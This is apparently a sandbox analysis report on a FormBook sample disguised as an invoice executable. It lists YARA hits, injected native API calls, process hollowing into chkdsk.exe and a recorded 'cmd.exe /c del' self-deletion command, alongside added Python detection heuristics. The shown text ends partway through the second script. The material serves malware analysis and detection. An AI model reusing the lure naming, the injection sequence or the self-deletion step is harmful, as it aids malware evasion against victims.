Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Executable has a suspicious name (potential lure to open the executable)
Source: INVOICE_90990_PDF.exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: INVOICE_90990_PDF.exe
Source: initial sample | Static PE information: Filename: INVOICE_90990_PDF.exe
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_004181D0 NtCreateFile
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00418280 NtReadFile
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00418300 NtClose
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_004183B0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_004181CA NtCreateFile
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041818D NtCreateFile
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041827A NtReadFile
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_004182FA NtClose
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_004183AA NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C298F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29840 NtDelayExecution, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C299A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29A50 NtCreateFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C295D0 NtClose, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29540 NtReadFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C296E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C297A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C298A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C2B040 NtSuspendThread
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29820 NtEnumerateKey
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C299D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29950 NtQueueApcThread
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29A10 NtQuerySection
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C2A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29B00 NtSetValueKey
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C295F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29560 NtWriteFile
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C29520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C2AD30 NtSetContextThread
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C296D0 NtCreateKey
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CD81D0 NtCreateFile
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CD8280 NtReadFile
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CD83B0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CD8300 NtClose
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CD81CA NtCreateFile
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CD818D NtCreateFile
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CD82FA NtClose
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CD827A NtReadFile
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CD83AA NtAllocateVirtualMemory
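The native-API rows above are the raw evidence behind the report's injection and hollowing verdicts: process 2 (the second INVOICE_90990_PDF.exe instance) resolves NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, NtWriteVirtualMemory, NtGetContextThread, NtSetContextThread, NtResumeThread and NtQueueApcThread through code at 0x00C29xxx, while the functions the report lists for chkdsk.exe (process 17) only cover file and memory primitives. The Python below is an added example, not part of the Joe Sandbox report and not FormBook's code: it parses a constructed subset of the report's own Code function rows (copied verbatim), collects the Nt* calls per process and reports which injection indicator sets are complete. The indicator sets, their names and the row regex are this example's own assumptions, not a published scoring scheme.

```python
"""Turn sandbox "Code function" rows into per-process injection-technique verdicts.

Added example, not part of the Joe Sandbox report and not FormBook code. The
indicator sets below are this example's own assumptions about which native
calls, taken together, are consistent with each technique.
"""
import re
from collections import defaultdict

# Constructed input: a subset of the report's rows, copied verbatim. Row format is
# "<proc>_<run>_<addr> <Api>[,<Api>...],<proc>_<run>_<addr>"; the trailing id is
# the report's link text repeating the function id.
SAMPLE_ROWS = """
2_2_004181D0 NtCreateFile,2_2_004181D0
2_2_00C298A0 NtWriteVirtualMemory,2_2_00C298A0
2_2_00C299A0 NtCreateSection,LdrInitializeThunk,2_2_00C299A0
2_2_00C29780 NtMapViewOfSection,LdrInitializeThunk,2_2_00C29780
2_2_00C297A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00C297A0
2_2_00C299D0 NtCreateProcessEx,2_2_00C299D0
2_2_00C29950 NtQueueApcThread,2_2_00C29950
2_2_00C2A3B0 NtGetContextThread,2_2_00C2A3B0
2_2_00C2AD30 NtSetContextThread,2_2_00C2AD30
2_2_00C29A20 NtResumeThread,LdrInitializeThunk,2_2_00C29A20
17_2_04CD81D0 NtCreateFile,17_2_04CD81D0
17_2_04CD8280 NtReadFile,17_2_04CD8280
17_2_04CD83B0 NtAllocateVirtualMemory,17_2_04CD83B0
"""

# The backreferences make the trailing id validate the row instead of being
# mistaken for an API name.
ROW_RE = re.compile(
    r"^(?P<proc>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]+)\s+"
    r"(?P<apis>[A-Za-z0-9_,]+?),(?P=proc)_(?P=run)_(?P=addr)$"
)

# Assumed indicator sets: every call in a set must be present for the verdict.
TECHNIQUES = {
    # classic hollowing: unmap the suspended child's image, write a new one,
    # repoint the thread context and resume
    "process_hollowing": {
        "NtUnmapViewOfSection", "NtWriteVirtualMemory",
        "NtGetContextThread", "NtSetContextThread", "NtResumeThread",
    },
    # section-object based injection: create a section and map it as a view
    "section_mapping": {"NtCreateSection", "NtMapViewOfSection"},
    # APC based execution of code in another thread
    "apc_queue": {"NtQueueApcThread"},
}


def parse_rows(text):
    """Map each process id to the set of API names its functions call."""
    calls = defaultdict(set)
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:            # malformed or unrelated row: skip, do not guess
            continue
        calls[int(m.group("proc"))].update(
            api for api in m.group("apis").split(",") if api)
    return calls


def injection_verdict(apis):
    """Names of techniques whose indicator set is fully covered by `apis`."""
    return [name for name, needed in TECHNIQUES.items() if needed <= apis]


def missing_for(apis, technique):
    """Which calls of a technique's indicator set are absent (for triage notes)."""
    return sorted(TECHNIQUES[technique] - apis)


if __name__ == "__main__":
    for proc, apis in sorted(parse_rows(SAMPLE_ROWS).items()):
        print(proc, injection_verdict(apis),
              "missing for hollowing:", missing_for(apis, "process_hollowing"))
```

A complete indicator set is evidence of capability, not proof of use: the report's dynamic signatures (thread-context change, APC queued, hollowing) are what confirm that the calls actually ran against another process, so treat this static scoring as a triage filter and read it together with the behaviour rows.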
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 0_2_004034A6
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 0_2_004041EF
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 0_2_004039A2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 0_2_00403DBA
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 0_2_00404624
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 0_2_0040D3BD
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041B84B
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00401030
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041CA15
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00408C6F
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00408C70
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041BC91
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00402D87
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00402D90
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00402FB0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00BFB090
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C120A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00CB20A8
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00CA1002
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00BEF900
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C04120
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00CB22AE
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C1EBB0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00CB2B28
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00BF841F
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C12581
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00BFD5E0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00BE0D20
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00CB1D55
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00CB2D07
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00CB2EF7
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CC8C6F
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CC8C70
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CC2D87
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CC2D90
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CC2FB0
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDB84B
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDCA15
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: String function: 00BEB150 appears 34 times
Source: INVOICE_90990_PDF.exe, 00000000.00000003.230287004.0000000002366000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICE_90990_PDF.exe
Source: INVOICE_90990_PDF.exe, 00000002.00000002.313510605.000000000079C000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs INVOICE_90990_PDF.exe
Source: INVOICE_90990_PDF.exe, 00000002.00000002.314480736.0000000000E6F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICE_90990_PDF.exe
Source: INVOICE_90990_PDF.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/0@9/6
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 0_2_00401120 CoCreateInstance
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5380:120:WilError_01
Source: INVOICE_90990_PDF.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: INVOICE_90990_PDF.exe | Virustotal: Detection: 34%
Source: INVOICE_90990_PDF.exe | ReversingLabs: Detection: 32%
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | File read: C:\Users\user\Desktop\INVOICE_90990_PDF.exe
Source: unknown | Process created: C:\Users\user\Desktop\INVOICE_90990_PDF.exe 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Process created: C:\Users\user\Desktop\INVOICE_90990_PDF.exe 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
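The process-creation rows above describe a chain that is easy to alert on from endpoint telemetry alone: the sample relaunches its own image, a Desktop executable starts a SysWOW64 system utility (chkdsk.exe) with no arguments, explorer.exe starts another bare SysWOW64 utility (autoconv.exe), and the chain ends with cmd.exe /c del against the original sample path. The Python below is an added example, not part of the Joe Sandbox report and not FormBook's code: it rebuilds the chain from constructed process-creation events (pids and parent links are invented; the images and command lines are the report's) and applies four heuristics over it. The rule names and the heuristics are this example's own assumptions.

```python
"""Flag the process chain the report shows from process-creation events.

Added example, not part of the Joe Sandbox report and not FormBook code. The
events are reconstructed from the report's "Process created" rows; the pids,
parent links, rule names and heuristics are this example's own assumptions.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")
DESKTOP_EXE = r"C:\Users\user\Desktop\INVOICE_90990_PDF.exe"

# Constructed events (pids invented): the report's chain, one row per creation.
EVENTS = [
    Proc(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(5000, 1000, DESKTOP_EXE, f"'{DESKTOP_EXE}'"),
    Proc(5002, 5000, DESKTOP_EXE, f"'{DESKTOP_EXE}'"),
    Proc(5100, 1000, r"C:\Windows\SysWOW64\autoconv.exe", r"C:\Windows\SysWOW64\autoconv.exe"),
    Proc(5200, 5002, r"C:\Windows\SysWOW64\chkdsk.exe", r"C:\Windows\SysWOW64\chkdsk.exe"),
    Proc(5300, 5200, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{DESKTOP_EXE}'"),
    Proc(5301, 5300, r"C:\Windows\System32\conhost.exe", "conhost.exe 0xffffffff -ForceV1"),
]

# "/c del <path>" with the path optionally single- or double-quoted
DEL_RE = re.compile(r"/c\s+del\s+['\"]?(?P<target>[^'\"]+?)['\"]?\s*$", re.IGNORECASE)


def is_user_path(image):
    return image.lower().startswith("c:\\users\\")


def is_system_binary(image):
    low = image.lower()
    return "\\syswow64\\" in low or "\\system32\\" in low


def has_arguments(p):
    # a command line that is only the (optionally quoted) image path carries no args
    return p.cmdline.strip().strip("'\"").lower() != p.image.lower()


def ancestors(pid, by_pid):
    """Walk parent links upward; the `seen` set guards against pid reuse cycles."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        # a binary relaunching its own image: stub -> suspended child pattern
        if parent.image.lower() == e.image.lower():
            findings.append(("self_spawn", e.pid))
        # an executable in a user-writable path launching a Windows system utility
        if is_user_path(parent.image) and is_system_binary(e.image):
            findings.append(("system_binary_from_user_exe", e.pid))
        # the shell launching a WOW64 utility with no arguments at all
        if (parent.image.lower().endswith("\\explorer.exe")
                and "\\syswow64\\" in e.image.lower() and not has_arguments(e)):
            findings.append(("explorer_spawns_bare_wow64_util", e.pid))
        # cmd.exe deleting the image of one of its own ancestors: self-deletion
        m = DEL_RE.search(e.cmdline)
        if m and e.image.lower().endswith("\\cmd.exe"):
            target = m.group("target").strip().lower()
            if any(a.image.lower() == target for a in ancestors(e.ppid, by_pid)):
                findings.append(("self_delete_via_cmd", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
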